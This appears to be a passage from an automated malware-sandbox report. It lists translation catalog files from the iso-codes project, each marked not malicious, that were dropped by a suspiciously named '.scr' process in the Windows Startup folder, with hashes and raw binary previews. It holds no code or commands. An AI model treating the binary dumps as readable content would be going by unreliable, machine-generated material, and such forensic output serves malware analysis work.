                                                                                                    SHA-512:75483B958F0768AF27B76DDBE53E5E08397433D395293ECED97C5E568C7AAD628BB6EFF2EB34176371A80D5A2055104CA89A6D768736D154606624EAFF268CDE
                                                                                                    Malicious:false
                                                                                                    Preview:........Z...............................................................................................................$.......6.......B.......K.......].......q.......z.......................................................................................................*.......1.......@.......O.......X.......l.......t...............................................................................................................................#.......-.......9.......B.......I.......P.......^.......i.......t.......}...............................................................................................................................0.......5.......<.......B.......L.......R...$...d...............................................................................................................................................................(.......2.......9.......@.......P.......Z.......d.......n.......~...............................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\354\230\201\352\265\255\353\240\271 \353\202\250\352\267\271 \354\247\200\354\227\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2783
                                                                                                    Entropy (8bit):5.888761773324434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3DNGnWm1LM5u+vGqIfdvqN5CoU1t46o74raBTInbSx52R03:rLvDNGnZ+yaCoG46Kun+z2s
                                                                                                    MD5:9F1D9AA5F80FFB91F7CCF19A7E68A499
                                                                                                    SHA1:722D2D6DDF24B98C88FEC7B47407EBB2EB7A74FF
                                                                                                    SHA-256:3642209B806FF687629760DEC35F2E093CA089AE178AC1669E2BEA7814691FC3
                                                                                                    SHA-512:FBAC10C864534852A378D74A23194DC45F4BC0D5A369D8F2AF7FBB1C51A6C308E56B46F6E20E2D18C112E165876685C1739051E3289C998F6AA8C04192FAA660
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................'.......0...........#...,...;.......h.......u...........................%...................................#...#...7.......[.......h...!...............................................*...........:.......Q.......l.......}...0....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\354\225\204\355\224\204\353\246\254\354\271\264\352\260\234\353\260\234\354\235\200\355\226\211 \352\263\204\354\240\225 \353\213\250\354\234\204'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10767
                                                                                                    Entropy (8bit):5.614389128415977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFGNbeWjNehzQOG7Y6VRyK0G/2LCntxVultpKPH539Gn9JKWFC0mETz2tYEYnbk:SsKqGe7Y6TL0G/Uo/oKPHqJKHiTz2hwo
                                                                                                    MD5:2135BBD942CAE51AF4A662A20F77FEE0
                                                                                                    SHA1:E10F6559FCFDBB973E89D7E52EADAFF0DA556D70
                                                                                                    SHA-256:9926DA537B85320126C5536DFD60F01B3F7AB7E859DBAB6167EC04E3A72759F3
                                                                                                    SHA-512:CEB1796F1CF26A5E1B242793124C69AC8DE3FBC10603C0A486C44AB9EBDD8BB2D1AD21E811950524390FDD3B1D311F8C73C3801720F83A3EEC26E9FDED2F6390
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 381 messages, Project-Id-Version: iso_639-3 '\354\225\225\355\225\230\354\212\244\354\226\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18040
                                                                                                    Entropy (8bit):5.358886411171497
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yBYycQTVT4L0loaFoEdsCj4lKxFMLs7tbQ4/VXEIWA8TGzRkZSVem7:yB3r4I9FjxO4/VXEIAK+AP7
                                                                                                    MD5:98076D5F48EB768BED20FF9A7C3DDD2E
                                                                                                    SHA1:B9F34E91CC5A5BD2D6B102E98078B0FF7D1E052F
                                                                                                    SHA-256:6B22F43555C28E592262EE860394860DB011176547D494D6F0FF3DCCD1127D33
                                                                                                    SHA-512:915C8EA099656C644F8EE72BB0D6E66AB02B9790B12757BEAE6F865962136182367B9B52A4476A3DAFA1FB8635181FA1238AEE4D822312529430F212BB9160CD
                                                                                                    Malicious:false
                                                                                                    Preview:........}........................................................ ....... ....... ....... ....... ......# ......- ......2 ......; ......C ......L ......b ......h ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!....../!......8!......F!......O!......V!......^!......e!......l!......x!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......!"......)"......2"......;"......C"......L"......U"......]"......e"......t"......|".......".......".......".......".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#......$#......*#......3#......C#......H#......[#......b#......j#......r#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......0$......9$......?$......B$......O$......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 120 messages, Project-Id-Version: iso_639-3 '\340\244\205\340\245\223\340\244\226\340\245\207\340\245\203\340\245\243\340\245\246\340\245\226\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6584
                                                                                                    Entropy (8bit):4.796179939870329
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eQGmddwh8S3eBVkjPP9qMNeRSxrco6TH2:eQGWdO8Su/YdqMNehL2
                                                                                                    MD5:772B928B1E6953E852CF75BEA32B92DF
                                                                                                    SHA1:48E31949C359BDCF362D6FC63F5AC875DE607C26
                                                                                                    SHA-256:E52E2BF6644B9085E1944A03A18A6340A38695A627222E7D92E94C25A57438F3
                                                                                                    SHA-512:B3D31B0198ECC2D467599C17E4922CAEBFA7EB8C4E66EF9DCF4B06BB3E8F1A1CCA5311F0B93269C74A75BA3FF0410EFC22757825944744E2005EF5B3C6323830
                                                                                                    Malicious:false
                                                                                                    Preview:........x.......................(.......).......3.......8.......B.......K.......S.......Z.......c.......l.......s.......................................................................................................................................................................#.......*.......2.......9.......B.......I......._.......g.......p.......v.......}...............................................................................................................................................................%.......-.......5.......@.......K.......T.......^.......f.......l.......t.......~.......................................................................................................................................................................'.......1.......7.......?.......G.......M.......S.......Y.......`.......e.......m.......v...................................................................................................................................L...........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 109 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5803
                                                                                                    Entropy (8bit):5.098920930476457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TSrCzC6I9kOhdxuoJJaWP9uYqLamudfy5M9ZOKj8UfnGsD9cbM9snfWf+rl3u:TtjI9/X/+WPRqLamoq0OKj3fGsxmcs+t
                                                                                                    MD5:A659A69A461BFA9B44ED254307C1938F
                                                                                                    SHA1:1E6A3F381318A6201E8C13F5C8B1B29F96C88F5C
                                                                                                    SHA-256:0596C7F0DF3B131AC53F4F9924E09DBB95D1B77B2F5869C1DCC31D28A5CCF439
                                                                                                    SHA-512:0389615FDE4CC851B6D546026198828EE34AF207739C4FA02E657F52A7FCFC274F2EFE4ED764060237B47A3A69FA77A5B04B9AB65CCF55EBE356F35B6E5C4C9E
                                                                                                    Malicious:false
                                                                                                    Preview:........m.......................@.......A.......M.......U.......].......g.......o.......y.......................................................................................................................................................*.......2.......E.......K.......W.......`.......n.......v.......}....................................................................................................................................................................... .......+.......2.......:.......H.......R.......].......f.......o.......u.......|...............................................................................................................................................'.......-.......5.......A.......L.......Y.......`.......j.......s.......|...............................................................................................................).......1.......7.......F...............-.......<.......K.......^.......m...............................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 211 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9310
                                                                                                    Entropy (8bit):4.779977332118223
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4XONIgXiXswvc0BohH5OLoyiTX4zugomuxCDVaBY6rPGENh:4ZUiXsxRgLoyizgugomuxCDVaBNrPGeh
                                                                                                    MD5:A351848456824D3F2EF389372E8D7771
                                                                                                    SHA1:7BFEA9A6F2497583319B1D763EF77967DEAA4FC3
                                                                                                    SHA-256:0F183DDF6295265F33677EE49E9F8B38EFA5617A3FAEB9229F3049DC33A6DA35
                                                                                                    SHA-512:E5992918C2EEF1FAA6876DC6C6FA9668B09A3E88FBE7AA15FF5416581B452FB380BE6F4C4082E680BAE16C79F92B5F030E0D799C7CCAE31AC45E4D9AFE3E2367
                                                                                                    Malicious:false
                                                                                                    Preview:........................L....................................................................................................... .......*.......2.......=.......E.......P.......Y.......a.......i.......p.......v.......~...............................................................................................................*......./.......5.......M.......V.......^.......k.......v.......~.......................................................................................................................0.......5.......=.......D.......R.......c.......i.......q.......y.......................................................................................................................................................................'.......3.......:.......@.......H.......N.......U.......\.......g.......m.......v.......}.......................................................................................................................................................'...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 414 messages, Project-Id-Version: Kyrgyz (iso-codes) '\320\236\320\276\320\263\320\260\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29069
                                                                                                    Entropy (8bit):5.283762117884823
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:CLojGNx9vmsOP4XLAIUtnKntsAK/g3tIb0GO3fMR7rL7O/2/6VTbP4Jed1bDNwSS:SNr+tytsAK/g3tIbi3fM5rL6/8QD4JGw
                                                                                                    MD5:FCCFBFFD0E54A38C95C426A5D853C455
                                                                                                    SHA1:7E1F01AB8B07CF35301B31D98565D117FFFD37B4
                                                                                                    SHA-256:D2BBC74779DE4401B9B0F0FF553669C9957DAC8BBC7E2D88A9CF4F3709AADDB0
                                                                                                    SHA-512:E6F891638301FB1DD0FA7CCC82651814A39D7B08D98DA92ABC92AF282DAABF8F1F04222769F7711ADB9C705F9BE11D2CE6FE24BE6C04912BF8E68D5ADD662402
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......#......*#......4#......G#......O#......U#......_#......g#......r#......z#.......#.......#.......#.......#.......#.......#.......#.......#.. ....#.......#.......#.. ....$......,$......C$......L$......Z$......a$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%......$%......5%......M%......V%......o%..,....%.......%.......%..%....%.......%.......%.......&.......&.......&.......&......!&......0&......8&..%...G&..,...m&.."....&..*....&.......&.......&.......&.......'.......'......1'......9'......?'......K'......]'......e'......m'......v'.......'..'....'..$....'.......'.......(......%(......A(......`(......~(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......).......)......6)......=)......G)......O)......Z)......_)......i)......r)......y).......).......).......)..!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 18 messages, Project-Id-Version: iso_3166-2 '\320\220\320\274\320\265\321\200\320\270\320\272\320\260 \320\241\320\260\320\274\320\276\320\260\321\201\321\213'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1419
                                                                                                    Entropy (8bit):5.44994817725979
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tZpO3Jwzug1+dQhhtthNky3NEfSt0UZT/i3E/IXmGfy4DXfbxQM0Npcqu:P1+dQHfhNp3af/UZDRADXj+1Nnu
                                                                                                    MD5:4D571B2B4FB5C93EB759E5767C65500F
                                                                                                    SHA1:732E6CB363D1258FFF0522EBE0777AC31435E7CE
                                                                                                    SHA-256:60DCE1BE9061B3B92A65B8ED5373AB9D55B0477DC3903A93817D8B9DC9E5E150
                                                                                                    SHA-512:549449D4734C45BCAE5AEC9BD761EE733D96AB04AB4C08D3BD4D4F87564E36FDA41E6CD02E442AECB25A0CE74F8B5F88F67B0E1C819F048F8C9F2418B145C0AB
                                                                                                    Malicious:false
                                                                                                    Preview:........................<.......................................................................................................................$.......*.......C...$...O.......t.......A......._.......j.......u...............................................................................................C...1...Y........................................................................................................................American Samoa.Aruba.Belize.Cura.ao.Djibouti.Georgia.Guadeloupe.Guam.Guatemala.Luxembourg.Mali.Martinique.Mayotte.Niger.Northern Mariana Islands.Puerto Rico.United States Minor Outlying Islands.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2018-02-20 17:37+0000.Last-Translator: Ilyas Bakirov <i.bakirov@gmail.com>.Language-Team: Kyrgyz <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ky/>.Language: ky.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Trans
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 79 messages, Project-Id-Version: iso_3166-1 '\340\272\233\340\272\260\340\273\200\340\272\227\340\272\224\340\272\255\340\272\261\340\272\207\340\272\224\340\272\255\340\272\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5756
                                                                                                    Entropy (8bit):4.869193348580799
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:g5hHWtz+sTG6ndCjA+utDymko6X1C1H9O2m0ipzQU1tHHaDv4+UQw7:EN6dCk+vmrdO2XipzQU1tHHaDvg37
                                                                                                    MD5:80E2F988B04790515A7A05EA049547A2
                                                                                                    SHA1:150DFA009DC80007355E513C9B90E094E3FFFF3F
                                                                                                    SHA-256:294571BEC0D29F1BF52D0DE07340001B7CB962C839621C150D277EC743AD8A3E
                                                                                                    SHA-512:495EE1A5552F98BB598CC1873DE16A7E4CDE7E920B3F784BBD8F2B5B44282DD71E94FC2AAF1F372F5A3EF5BCF37E9F51A4226CD910414AED9E315BB4BEB1A7BA
                                                                                                    Malicious:false
                                                                                                    Preview:........O...........k...................................................................................................................1.......8.......A.......J.......Q.......W.......`.......k.......s.......z...............................................................................................................................................................&.......0.......;.......D.......J.......Q.......X.......`.......l.......x.......................................................................................................................................!.......*.......1.......=.......D.......M.......U.......d.......}...........................!...c...$...............$.......*.......$.......0...;...-...l...*.......!.......!.......B.......$...L...$...q...$.......!...............$.......0.......'...9.......a...-...z...!.......'...............!.......!...0...'...R...*...z...!.......*.......!...............$...'.......L...-...e...!...............$.......$.......0.......$...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 181 messages, Project-Id-Version: iso_15924 'Adlamas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10170
                                                                                                    Entropy (8bit):5.135788454292222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:D+gwxVk669aQmZaitBarpVatU4WjV9qWxa5hWHA0POFP32GG:b+2CFWrpVR4WjVDxa5hWH7OFmGG
                                                                                                    MD5:5E0B53C57A76BBBC0BA58EFE09043278
                                                                                                    SHA1:031FF82110AE6B61915084C5BA458DC69C0049ED
                                                                                                    SHA-256:F5061E6C1D155D9AF7974F1AF4D945348D9EA5C96EAFC4622312A3175452D84B
                                                                                                    SHA-512:072C4B2373167E303F1CEF6D80CCA22CF6BD4ED38D2FD687B41BED238DEC86C08398CF9E1B78B2F7A9EBAC6A4F5C3129738DDF9A98B11C0EE9C94BAF14610154
                                                                                                    Malicious:false
                                                                                                    Preview:........................l.......0.......1.......7.......=...?...L.......................................................................................................................................%.......,.......?.......F.......K.......T.......Z.......t...................................................&........... .......1...(...E.......n.......................................................................................................!.......:...,...T...........................................................................&...........;...4...j...................................................................................................#...#.......G.......[.......{.......................................................................................................................................-.......8.......@.......V.......h...................................................(.......................................-...8.......f...!...r...........................#...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistanas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24199
                                                                                                    Entropy (8bit):5.088600417448717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosUIBPcDz0LBa346nbjz5wsWP48WAINiZGCu6uY6qmsI713dzlUcfNBL:0okhdY48fmsWP48WAI3vqA1/fNd
                                                                                                    MD5:08750EAE16EB7CEACE425D32DBEAB496
                                                                                                    SHA1:E822E4D77A708D11CF6E388EA5C40B094DCAFC80
                                                                                                    SHA-256:A16370FC72E761756B6916342587F6AB656A2BFBB1E73797EEE23BCF3D50B8B7
                                                                                                    SHA-512:4827B18C8A8A8AA3B4AA20DF7AA4741FEA64B98BEE664A378D27D166124E380B4323C712BB1D6E13299D88F9310DFA7C90729932F97359F1F42805BD505F53E3
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1666 messages, Project-Id-Version: iso_3166-2 'Aargau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75519
                                                                                                    Entropy (8bit):5.104631523073754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:O5G4fnuIZp3t8nlrB6/jyjgxTY/Dkhs1ND:mVfnuID3erB6jEOTY461d
                                                                                                    MD5:3A8E1C76E04991C0A71FEAA64E596140
                                                                                                    SHA1:BD0641DCF9462983FCB2250942E5B8B518925D56
                                                                                                    SHA-256:067A7AB2151F5B146E59F59D46F621C94B0BF8CF6A4487F2482065FFDCD3CF3F
                                                                                                    SHA-512:B012033E9B08F2F9284DE7DA45C44403BA8FCC6F7FD585A04FA91AA483E4FD64B1696865FA3FCDB0C65DE3390815C547ECB526FE2F31554BA9DC592479BE8616
                                                                                                    Malicious:false
                                                                                                    Preview:................,4......<h.....................................................".......*.......3.......8.......=.......F.......N.......T.......Z.......d.......k.......z.........................................................................................................................................................".......'.......0.......8.......D.......J.......R.......Y.......`.......i.......y..........................................................................................................*.......1.......8.......@.......M.......W.......c.......m.......y................................................................................................................................#.......,.......4.......<.......C.......I.......W.......e.......k.......r.......w...................................................................................................................................).......:.......E.......L.......T.......[.......d.......j.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brit\305\263 Antarktidos teritorija'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2987
                                                                                                    Entropy (8bit):5.305470023692067
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3XAElp2U3f+vGqIfdvqN5CoUrcofdPQv/TlkU/IuHKwFNA1/I+/ayiyhZDBxs:rLvXA6f+yaCo+cofdPQGE/DegbEss0
                                                                                                    MD5:8BE8BCFF1A73375F64C1CD09CB02B00B
                                                                                                    SHA1:E5BC1E8B1A4F1533C4A7C82CB7BBAA216AF49048
                                                                                                    SHA-256:91503BF2C78A9403E2215B00BABB21B98BC909BBB0FA2B5D7101A108BDB90424
                                                                                                    SHA-512:96CA99B6E7929B2A98EE8573F98A520196CACF08998FDA615D25C1CC131BB0E218F6C52A3E266CD4EA0A3E8865AACAA841DF0476DC4B9E30EE3A1C46A74ECFFF
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............F...........4...(...R...-...{...........8...........................!......./.......H...1...b..."...........................................................).......X.......l...................%.......1............... ...........3...'...>...3...f................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Afrikos pl\304\227tros banko valiutos/apskaitos vienetas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10089
                                                                                                    Entropy (8bit):5.011402842696877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFi7lqD+HM6VRyK0G/2LCntxaVLyEIGYMZ2nP5t6coLfK:SEqDwM6TL0G/Uo/IOG8nXwK
                                                                                                    MD5:ACAADB0967D5387B142A8314C6899E6D
                                                                                                    SHA1:4BD9684275C5DEADB246F64EF9EDF21012E18DEF
                                                                                                    SHA-256:A563DE9AEDD2B2F81E7288715A4432756BEB9FE60EF01934F362DB211789A1ED
                                                                                                    SHA-512:A045C58A114B09E4BE99E75275FF5D566753A2447195A9E3CC0D3C890349ECEA4EAACAAE38750738BD386FC198584A430B2769ED06A0C46260BE50ACB023898B
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 633 messages, Project-Id-Version: iso_639-3 'Abchaz\305\263'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31678
                                                                                                    Entropy (8bit):5.065490467899256
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:c0sPgHvWSSJB+e2T1HMVzrC8ESY9ApxrguSm4:c09H0opszrJEBCpxcus
                                                                                                    MD5:4053466C8587AD120F43CBE0C7AB6175
                                                                                                    SHA1:D0DF527B0D71C84938F70209DBAC240CFDB4A5F5
                                                                                                    SHA-256:7381EB555156D562078362E80F0D5E1A48BB9A003811A565FED23239E7D049FC
                                                                                                    SHA-512:27B97A5F3C79BDE5C2A4248FA372A58821FED0CA9A5614AE932B7F9E552B69ADC7872FFF96557A86253AA2AC0DB4148F3FBBE9BC7CD3A21E5A28E479BFEEED4D
                                                                                                    Malicious:false
                                                                                                    Preview:........y...........U....'.......5.......5.......5.......5.......5......"5......)5.......5......C5......L5......V5......c5......p5......u5......~5.......5.......5.......5.......5.......5.......5.......5.......5.......6.......6.......6......-6......;6......X6......h6......o6.......6.......6.......6.......6.......6.......6.......6.......6.......7......%7......:7......I7......^7......o7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......8.......8......#8......:8......N8......_8......h8..#...q8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9.......9......+9......39......;9......B9......H9......M9......X9......g9......o9......x9......~9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......:.......:.......:......7:......>:......L:......]:......l:......t:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;......#;......9;......F;......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 115 messages, Project-Id-Version: iso_639-5 'Afroazin\304\227s kalbos'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7646
                                                                                                    Entropy (8bit):5.0127082628901505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rjToG70K5Ev/KAqxlSlSE0BfCuXr5VFJHVCcGfdP3ARzpH8Re6ysy7j:rXL7d5m/KQSE0BfNFaTARqsN
                                                                                                    MD5:20CBACEADE012DCBA81106585FEAD3B1
                                                                                                    SHA1:35503FB72D474D454B2DD0F9054DAE573FDC5F5B
                                                                                                    SHA-256:AD019A631494E4002A7ABD80216D57C7425017ADC681A5B334EE9A2304FF87C5
                                                                                                    SHA-512:CD68DE59334097E2F35ED83F22A3B41B25EF2FC6ED17173AB5C249DF5BB2B568B280CA352DADB26D7414EC127430940E50E5058EBB1124EDCB2CF8F3041CBB43
                                                                                                    Malicious:false
                                                                                                    Preview:........s...............L.......................................................%.......6.......G.......X.......k.......}...............................................................).......9.......I.......Y.......i.......z...........................!.......#...................".......3.......D.......W.......h...$...|...#.......%...................................*...#...@.......d.......~.......................................................................(.......8.......P.......g.......y.......................................................................'.......7.......H.......X.......l...............................................................!.......:.......K.......\.......s...............................................................................).......@.......Q.......b.......t...............................................................................?.......U.......h...........#...............................D...................A.......S.......b.......o.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 169 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9267
                                                                                                    Entropy (8bit):5.109043844964091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6nCkD5TDkqeEmh64Lj4Sa5hW8sxNUQhAx2Jwuk:oJMI4Ljza5hW8sxdhiOwR
                                                                                                    MD5:E9FCED380C9861BC3913CC45D7253D9C
                                                                                                    SHA1:294673BC48C072A6CAA6B2D63D2E6A0C65860BE5
                                                                                                    SHA-256:3A84BCAAE73091E117C5F9F5446B454E5B599D195F3BF96F994B3F277B4F365F
                                                                                                    SHA-512:FBDA6F8C85D1C90FC4E58281B35B9C680CFAA30EE319A3328C434A49CC695569EF88B08A10E6A911C691CC4BB70EC4FC1006BD2F5E442600A0AAC7AC4B1EB2A8
                                                                                                    Malicious:false
                                                                                                    Preview:................d...............8.......9...?...?...............................................................................................................................................................$.......-.......3.......M.......e...........................................&.......................(...........G.......X.......j.......................................................................................................-.......G.......Z.......a.......h.......q...................................4...........$.......-.......5.......<.......D.......M.......V.......a.......g.......n...#...................................................................................".......+.......9.......>.......E.......L.......U......._.......q.......|...................................................................(...........G.......P.......X.......j...-...t...................................#...............".......)...).......S.......^.......j.......|...............................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 410 messages, Project-Id-Version: iso_3166-1 'Afganist\304\201na'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22888
                                                                                                    Entropy (8bit):5.084007169254144
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:te7hGfQDzPGKQnxtHiw2u6gIoG8je5wsOP4XLAE1irKYRlR6VV8Zr8Y+Ue:prKQHHiJCFn6msOP4XLAEWXZrpW
                                                                                                    MD5:D28EFACC6661D9E69A7D26EA6CEBC580
                                                                                                    SHA1:8AA8359B1A749FBB5753EA7D46253030D19B7349
                                                                                                    SHA-256:15B8A0118264BA73EE29A5D12BCA29F854014ADB3F7A190F1FB4F9531166D0EB
                                                                                                    SHA-512:3AF45B9D781DEFFD7B75634918CB7E7A6783B0135CA23DB8096BFA5759D52D1913AA81AE5FF71AC4AB1FE8F0A49DC4A1296AC77081783782244A80386E639E34
                                                                                                    Malicious:false
